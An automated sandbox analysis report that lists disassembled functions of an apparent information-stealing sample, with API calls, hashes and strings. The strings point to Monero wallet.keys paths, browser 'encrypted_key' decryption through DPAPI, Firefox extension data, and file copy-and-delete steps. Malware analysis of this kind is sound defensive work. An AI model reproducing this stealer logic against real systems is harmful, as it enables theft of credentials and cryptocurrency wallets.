Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: a9f89a1fdd49d373c1af9a386af532c3cbb99400ce791e2ffda323b2d496396c
Instruction ID: 843482cfa2d9b260b95e0310acce4b28406e8e66446267c28629f5317e25de63
Opcode Fuzzy Hash: a9f89a1fdd49d373c1af9a386af532c3cbb99400ce791e2ffda323b2d496396c
Instruction Fuzzy Hash: A4114CB2A44205EBDB00DB94DD49FBFFBB8EB08B50F10415AF609A7280D7B45800CBA2

Function 00AB12A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00AB12B4
RtlAllocateHeap.NTDLL(00000000), ref: 00AB12BB
RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 00AB12D7
RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00AB12F5
RegCloseKey.ADVAPI32(?), ref: 00AB12FF

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: ee67483a2e503886bb497f4f65b28a44001960b5cda7482ebc0e8f5ae32feb9a
Instruction ID: 72c321e62352ecc684777d85907f73e85412a37a46aeb2f736fca2567f20fd1d
Opcode Fuzzy Hash: ee67483a2e503886bb497f4f65b28a44001960b5cda7482ebc0e8f5ae32feb9a
Instruction Fuzzy Hash: 1601C2B9A40208BBDB04DFD4DC59FAEB7B8EB48705F108155FA0997280D675AA01CF51

Function 00ABA0A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116libraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(005E8AB8,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF), ref: 00ABA0BD
LoadLibraryA.KERNEL32(005D6380), ref: 00ABA146

Part of subcall function 00ACA740: lstrcpy.KERNEL32(00AD0E17,00000000), ref: 00ACA788

Part of subcall function 00ACA820: lstrlen.KERNEL32(00AB4F05,?,?,00AB4F05,00AD0DDE), ref: 00ACA82B
Part of subcall function 00ACA820: lstrcpy.KERNEL32(00AD0DDE,00000000), ref: 00ACA885

Part of subcall function 00ACA9B0: lstrlen.KERNEL32(?,005E8CA8,?,\Monero\wallet.keys,00AD0E17), ref: 00ACA9C5
Part of subcall function 00ACA9B0: lstrcpy.KERNEL32(00000000), ref: 00ACAA04
Part of subcall function 00ACA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ACAA12

Part of subcall function 00ACA920: lstrcpy.KERNEL32(00000000,?), ref: 00ACA972
Part of subcall function 00ACA920: lstrcat.KERNEL32(00000000), ref: 00ACA982

Part of subcall function 00ACA8A0: lstrcpy.KERNEL32(?,00AD0E17), ref: 00ACA905

SetEnvironmentVariableA.KERNEL32(005E8AB8,00000000,00000000,?,00AD12D8,?,?,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,00AD0AFE), ref: 00ABA132

Strings

C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 00ABA0B2, 00ABA0C6, 00ABA0DC

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
API String ID: 2929475105-1193256905
Opcode ID: 66b28453c424e2f9d0baf513751e9311c45067bbb7ab786cc6e66089779d8275
Instruction ID: 202b23f426b09c4714308b56345d7c18ab766e2f4430ad0f5768f9024799544b
Opcode Fuzzy Hash: 66b28453c424e2f9d0baf513751e9311c45067bbb7ab786cc6e66089779d8275
Instruction Fuzzy Hash: 22411BF1901108AFCB08EFA4ED95BFEB7B8BB58305F154129F50AD22A1DB356944CB63

Function 00ABA260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00ACA740: lstrcpy.KERNEL32(00AD0E17,00000000), ref: 00ACA788

Part of subcall function 00ACA9B0: lstrlen.KERNEL32(?,005E8CA8,?,\Monero\wallet.keys,00AD0E17), ref: 00ACA9C5
Part of subcall function 00ACA9B0: lstrcpy.KERNEL32(00000000), ref: 00ACAA04
Part of subcall function 00ACA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ACAA12

Part of subcall function 00ACA8A0: lstrcpy.KERNEL32(?,00AD0E17), ref: 00ACA905

Part of subcall function 00AC8B60: GetSystemTime.KERNEL32(00AD0E1A,005EE870,00AD05AE,?,?,00AB13F9,?,0000001A,00AD0E1A,00000000,?,005E8CA8,?,\Monero\wallet.keys,00AD0E17), ref: 00AC8B86

Part of subcall function 00ACA920: lstrcpy.KERNEL32(00000000,?), ref: 00ACA972
Part of subcall function 00ACA920: lstrcat.KERNEL32(00000000), ref: 00ACA982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00ABA2E1
lstrlen.KERNEL32(00000000,00000000), ref: 00ABA3FF
lstrlen.KERNEL32(00000000), ref: 00ABA6BC

Part of subcall function 00ACA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00ACA7E6

DeleteFileA.KERNEL32(00000000), ref: 00ABA743

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 196a1a1b5ad994b33fa45ceee5b34103f2860c7e64ffc6d7642a43ed4be3b263
Instruction ID: a609f8b5c41aae3afccfbf1abd9fbfacf6b8946b99902caeb1b503672cc2cd2e
Opcode Fuzzy Hash: 196a1a1b5ad994b33fa45ceee5b34103f2860c7e64ffc6d7642a43ed4be3b263
Instruction Fuzzy Hash: 08E1EB7291010C9BDB14EBA4DE92FFEB338AF24304F51856DF517B6091EE306A49CB66

Function 00ABD780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00ACA740: lstrcpy.KERNEL32(00AD0E17,00000000), ref: 00ACA788

Part of subcall function 00ACA9B0: lstrlen.KERNEL32(?,005E8CA8,?,\Monero\wallet.keys,00AD0E17), ref: 00ACA9C5
Part of subcall function 00ACA9B0: lstrcpy.KERNEL32(00000000), ref: 00ACAA04
Part of subcall function 00ACA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ACAA12

Part of subcall function 00ACA8A0: lstrcpy.KERNEL32(?,00AD0E17), ref: 00ACA905

Part of subcall function 00AC8B60: GetSystemTime.KERNEL32(00AD0E1A,005EE870,00AD05AE,?,?,00AB13F9,?,0000001A,00AD0E1A,00000000,?,005E8CA8,?,\Monero\wallet.keys,00AD0E17), ref: 00AC8B86

Part of subcall function 00ACA920: lstrcpy.KERNEL32(00000000,?), ref: 00ACA972
Part of subcall function 00ACA920: lstrcat.KERNEL32(00000000), ref: 00ACA982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00ABD801
lstrlen.KERNEL32(00000000), ref: 00ABD99F
lstrlen.KERNEL32(00000000), ref: 00ABD9B3
DeleteFileA.KERNEL32(00000000), ref: 00ABDA32

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 645f9b82f52f6f7263f51990d93c09ea5cf7ae1e35034162b7358de9a5620094
Instruction ID: f5fc2fc732fb7c50fa5aebd5a64ac2e0fd86bc3d999e87d97d0c712aaf40af1c
Opcode Fuzzy Hash: 645f9b82f52f6f7263f51990d93c09ea5cf7ae1e35034162b7358de9a5620094
Instruction Fuzzy Hash: D581AC7291010C9BDB14FBA4DE96FFE7338AF64304F51452DF507A6192EE346A09CBA2

Function 00ABF4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00ACA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00ACA7E6

Part of subcall function 00AB99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00AB99EC
Part of subcall function 00AB99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00AB9A11
Part of subcall function 00AB99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00AB9A31
Part of subcall function 00AB99C0: ReadFile.KERNEL32(000000FF,?,00000000,00AB148F,00000000), ref: 00AB9A5A
Part of subcall function 00AB99C0: LocalFree.KERNEL32(00AB148F), ref: 00AB9A90
Part of subcall function 00AB99C0: CloseHandle.KERNEL32(000000FF), ref: 00AB9A9A

Part of subcall function 00AC8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00AC8E52

Part of subcall function 00ACA740: lstrcpy.KERNEL32(00AD0E17,00000000), ref: 00ACA788

Part of subcall function 00ACA9B0: lstrlen.KERNEL32(?,005E8CA8,?,\Monero\wallet.keys,00AD0E17), ref: 00ACA9C5
Part of subcall function 00ACA9B0: lstrcpy.KERNEL32(00000000), ref: 00ACAA04
Part of subcall function 00ACA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ACAA12

Part of subcall function 00ACA8A0: lstrcpy.KERNEL32(?,00AD0E17), ref: 00ACA905

Part of subcall function 00ACA920: lstrcpy.KERNEL32(00000000,?), ref: 00ACA972
Part of subcall function 00ACA920: lstrcat.KERNEL32(00000000), ref: 00ACA982

StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00AD1580,00AD0D92), ref: 00ABF54C
lstrlen.KERNEL32(00000000), ref: 00ABF56B

Strings

^userContextId=4294967295, xrefs: 00ABF59C
moz-extension+++, xrefs: 00ABF5AD

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
String ID: ^userContextId=4294967295$moz-extension+++
API String ID: 998311485-3310892237
Opcode ID: e4b8c42790a8b103fc50a4fe067d56d0284a9e8758a783af3c7d48d38b09fd12
Instruction ID: 10e203925ee09b91249beabe09bf2c6ef368b0d8c917993b47005b48d229254a
Opcode Fuzzy Hash: e4b8c42790a8b103fc50a4fe067d56d0284a9e8758a783af3c7d48d38b09fd12
Instruction Fuzzy Hash: 1F51E071D1010CABDB14FBA4ED96EFD7378AF64304F41852DF816A7191EE346A09CBA2

Function 00AB9CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 00ACA740: lstrcpy.KERNEL32(00AD0E17,00000000), ref: 00ACA788

Part of subcall function 00AB99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00AB99EC
Part of subcall function 00AB99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00AB9A11
Part of subcall function 00AB99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00AB9A31
Part of subcall function 00AB99C0: ReadFile.KERNEL32(000000FF,?,00000000,00AB148F,00000000), ref: 00AB9A5A
Part of subcall function 00AB99C0: LocalFree.KERNEL32(00AB148F), ref: 00AB9A90
Part of subcall function 00AB99C0: CloseHandle.KERNEL32(000000FF), ref: 00AB9A9A

Part of subcall function 00AC8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00AC8E52

StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00AB9D39

Part of subcall function 00AB9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00AB4EEE,00000000,00000000), ref: 00AB9AEF
Part of subcall function 00AB9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00AB4EEE,00000000,?), ref: 00AB9B01
Part of subcall function 00AB9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00AB4EEE,00000000,00000000), ref: 00AB9B2A
Part of subcall function 00AB9AC0: LocalFree.KERNEL32(?,?,?,?,00AB4EEE,00000000,?), ref: 00AB9B3F

Part of subcall function 00AB9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00AB9B84
Part of subcall function 00AB9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00AB9BA3
Part of subcall function 00AB9B60: LocalFree.KERNEL32(?), ref: 00AB9BD3

Strings

DPAPI, xrefs: 00AB9D89
"encrypted_key":", xrefs: 00AB9D30
, xrefs: 00AB9DC1

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
